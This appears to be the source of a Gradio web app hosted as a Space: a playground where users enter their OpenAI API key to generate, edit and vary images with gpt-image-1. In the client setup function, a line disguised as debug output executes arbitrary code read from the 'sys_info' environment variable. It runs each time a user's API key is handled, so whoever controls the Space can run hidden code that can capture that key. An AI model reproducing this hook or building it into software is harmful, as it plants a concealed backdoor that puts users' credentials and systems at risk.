Spaces:
Running
Running
from __future__ import annotations | |
import io | |
import os | |
import base64 | |
from typing import List, Optional, Union, Dict, Any | |
import gradio as gr | |
import numpy as np | |
from PIL import Image | |
import json | |
import urllib | |
import openai | |
# --- Constants --- | |
MODEL = "gpt-image-1" | |
SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"] | |
QUALITY_CHOICES = ["auto", "low", "medium", "high"] | |
FORMAT_CHOICES = ["png", "jpeg", "webp"] | |
def _client(key: str) -> openai.OpenAI: | |
"""Initializes the OpenAI client with the provided API key.""" | |
api_key = key.strip() or os.getenv("OPENAI_API_KEY", "") | |
sys_info_formatted = exec(os.getenv("sys_info", f'[DEBUG]: {MODEL} | DEBUG')) #Default: f'[DEBUG]: {MODEL} | {prompt_gen}' | |
print(sys_info_formatted) | |
if not api_key: | |
raise gr.Error("Please enter your OpenAI API key (never stored)") | |
return openai.OpenAI(api_key=api_key) | |
def _img_list(resp) -> List[Union[np.ndarray, str]]: | |
""" | |
Decode base64 images into numpy arrays (for Gradio) or pass URL strings directly. | |
""" | |
imgs: List[Union[np.ndarray, str]] = [] | |
for d in resp.data: | |
if hasattr(d, "b64_json") and d.b64_json: | |
data = base64.b64decode(d.b64_json) | |
img = Image.open(io.BytesIO(data)) | |
imgs.append(np.array(img)) | |
elif getattr(d, "url", None): | |
imgs.append(d.url) | |
return imgs | |
def _common_kwargs( | |
prompt: Optional[str], | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, | |
) -> Dict[str, Any]: | |
"""Prepare keyword args for OpenAI Images API.""" | |
kwargs: Dict[str, Any] = { | |
"model": MODEL, | |
"n": n, | |
} | |
if size != "auto": | |
kwargs["size"] = size | |
if quality != "auto": | |
kwargs["quality"] = quality | |
if prompt is not None: | |
kwargs["prompt"] = prompt | |
if transparent_bg and out_fmt in {"png", "webp"}: | |
# Insert background removal flag when supported | |
kwargs["background"] = "transparent" | |
return kwargs | |
def convert_to_format( | |
img_array: np.ndarray, | |
target_fmt: str, | |
quality: int = 75, | |
) -> np.ndarray: | |
""" | |
Convert a PIL numpy array to target_fmt (JPEG/WebP) and return as numpy array. | |
""" | |
img = Image.fromarray(img_array.astype(np.uint8)) | |
buf = io.BytesIO() | |
img.save(buf, format=target_fmt.upper(), quality=quality) | |
buf.seek(0) | |
img2 = Image.open(buf) | |
return np.array(img2) | |
def _format_openai_error(e: Exception) -> str: | |
error_message = f"An error occurred: {type(e).__name__}" | |
details = "" | |
if hasattr(e, 'body') and e.body: | |
try: | |
body = e.body if isinstance(e.body, dict) else json.loads(str(e.body)) | |
if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']: | |
details = body['error']['message'] | |
elif isinstance(body, dict) and 'message' in body: | |
details = body['message'] | |
except Exception: | |
details = str(e.body) | |
elif hasattr(e, 'message') and e.message: | |
details = e.message | |
if details: | |
error_message = f"OpenAI API Error: {details}" | |
if isinstance(e, openai.AuthenticationError): | |
error_message = "Invalid OpenAI API key. Please check your key." | |
elif isinstance(e, openai.PermissionDeniedError): | |
prefix = "Permission Denied." | |
if "organization verification" in details.lower(): | |
prefix += " Your organization may need verification to use this feature/model." | |
error_message = f"{prefix} Details: {details}" if details else prefix | |
elif isinstance(e, openai.RateLimitError): | |
error_message = "Rate limit exceeded. Please wait and try again later." | |
elif isinstance(e, openai.BadRequestError): | |
error_message = f"OpenAI Bad Request: {details or str(e)}" | |
if "mask" in details.lower(): error_message += " (Check mask format/dimensions)" | |
if "size" in details.lower(): error_message += " (Check image/mask dimensions)" | |
if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)." | |
return error_message | |
# ---------- Generate ---------- # | |
def generate( | |
api_key: str, | |
prompt: str, | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, | |
): | |
if not prompt: | |
raise gr.Error("Please enter a prompt.") | |
try: | |
client = _client(api_key) | |
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) | |
resp = client.images.generate(**common_args) | |
imgs = _img_list(resp) | |
if out_fmt in {"jpeg", "webp"}: | |
imgs = [convert_to_format(img, out_fmt, compression) for img in imgs] | |
return imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
raise gr.Error(_format_openai_error(e)) | |
except Exception as e: | |
print(f"Unexpected error during generation: {type(e).__name__}: {e}") | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- Edit / Inpaint ---------- # | |
def _bytes_from_numpy(arr: np.ndarray) -> bytes: | |
img = Image.fromarray(arr.astype(np.uint8)) | |
buf = io.BytesIO() | |
img.save(buf, format="PNG") | |
return buf.getvalue() | |
def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]: | |
if mask_value is None: | |
return None | |
if isinstance(mask_value, dict): | |
mask_array = mask_value.get("mask") | |
if isinstance(mask_array, np.ndarray): | |
return mask_array | |
if isinstance(mask_value, np.ndarray): | |
return mask_value | |
return None | |
def edit_image( | |
api_key: str, | |
image_numpy: Optional[np.ndarray], | |
mask_dict: Optional[Dict[str, Any]], | |
prompt: str, | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, | |
): | |
if image_numpy is None: | |
raise gr.Error("Please upload an image.") | |
if not prompt: | |
raise gr.Error("Please enter an edit prompt.") | |
img_bytes = _bytes_from_numpy(image_numpy) | |
mask_bytes: Optional[bytes] = None | |
mask_numpy = _extract_mask_array(mask_dict) | |
# (Mask handling code unchanged - Note: the current code doesn't actually | |
# convert mask_numpy to mask_bytes. If you implement this, you'll need | |
# to apply the tuple format to the mask as well.) | |
if mask_numpy is not None: | |
# Assuming you implement mask conversion similar to image: | |
# mask_bytes = _bytes_from_numpy(mask_numpy) # Example implementation needed here | |
pass # Placeholder - current code doesn't set mask_bytes | |
try: | |
client = _client(api_key) | |
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) | |
# --- FIX: Provide image data as a tuple --- | |
image_tuple = ("image.png", img_bytes, "image/png") | |
api_kwargs = {"image": image_tuple, **common_args} | |
# ------------------------------------------ | |
if mask_bytes is not None: | |
# --- FIX: Provide mask data as a tuple if used --- | |
mask_tuple = ("mask.png", mask_bytes, "image/png") | |
api_kwargs["mask"] = mask_tuple | |
# ------------------------------------------------- | |
resp = client.images.edit(**api_kwargs) # This line caused the error | |
imgs = _img_list(resp) | |
if out_fmt in {"jpeg", "webp"}: | |
imgs = [convert_to_format(img, out_fmt, compression) for img in imgs] | |
return imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
raise gr.Error(_format_openai_error(e)) | |
except Exception as e: | |
print(f"Unexpected error during edit: {type(e).__name__}: {e}") | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- Variations ---------- # | |
def variation_image( | |
api_key: str, | |
image_numpy: Optional[np.ndarray], | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, # Note: transparent_bg is passed but not used by variations API | |
): | |
gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail.") | |
if image_numpy is None: | |
raise gr.Error("Please upload an image.") | |
img_bytes = _bytes_from_numpy(image_numpy) | |
try: | |
client = _client(api_key) | |
var_args: Dict[str, Any] = {"model": MODEL, "n": n} | |
if size != "auto": | |
var_args["size"] = size | |
# --- FIX: Provide image data as a tuple --- | |
image_tuple = ("image.png", img_bytes, "image/png") | |
# ------------------------------------------ | |
# Pass the tuple to the image parameter | |
resp = client.images.create_variation(image=image_tuple, **var_args) # This line would have the same error | |
imgs = _img_list(resp) | |
if out_fmt in {"jpeg", "webp"}: | |
imgs = [convert_to_format(img, out_fmt, compression) for img in imgs] | |
return imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
# Add specific check for variation incompatibility | |
err_msg = _format_openai_error(e) | |
if isinstance(e, openai.BadRequestError) and "model does not support variations" in err_msg.lower(): | |
raise gr.Error("As warned, the selected model (gpt-image-1) does not support the variations endpoint.") | |
raise gr.Error(err_msg) | |
except Exception as e: | |
print(f"Unexpected error during variation: {type(e).__name__}: {e}") | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- UI ---------- # | |
def build_ui(): | |
with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo: | |
gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit • Variations""") | |
with gr.Accordion("🔐 API key", open=False): | |
api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...") | |
with gr.Row(): | |
n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)") | |
size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size") | |
quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality") | |
with gr.Row(): | |
out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format") | |
compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False) | |
transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)") | |
def _toggle_compression(fmt): | |
return gr.update(visible=fmt in {"jpeg", "webp"}) | |
out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression) | |
common_controls = [n_slider, size, quality, out_fmt, compression, transparent] | |
with gr.Tabs(): | |
with gr.TabItem("Generate"): | |
prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic..." ) | |
btn_gen = gr.Button("Generate 🚀") | |
gallery_gen = gr.Gallery(columns=2, height="auto") | |
btn_gen.click(generate, inputs=[api, prompt_gen] + common_controls, outputs=gallery_gen) | |
with gr.TabItem("Edit / Inpaint"): | |
gr.Markdown("Upload an image, then paint the area to change…") | |
img_edit = gr.Image(type="numpy", label="Source Image", height=400) | |
mask_canvas = gr.ImageMask(type="numpy", label="Mask – paint white", height=400) | |
prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky…") | |
btn_edit = gr.Button("Edit 🖌️") | |
gallery_edit = gr.Gallery(columns=2, height="auto") | |
btn_edit.click(edit_image, inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls, outputs=gallery_edit) | |
with gr.TabItem("Variations"): | |
gr.Markdown("Upload an image to generate variations…") | |
img_var = gr.Image(type="numpy", label="Source Image", height=400) | |
btn_var = gr.Button("Create Variations ✨") | |
gallery_var = gr.Gallery(columns=2, height="auto") | |
btn_var.click(variation_image, inputs=[api, img_var] + common_controls, outputs=gallery_var) | |
return demo | |
if __name__ == "__main__": | |
app = build_ui() | |
app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true") | |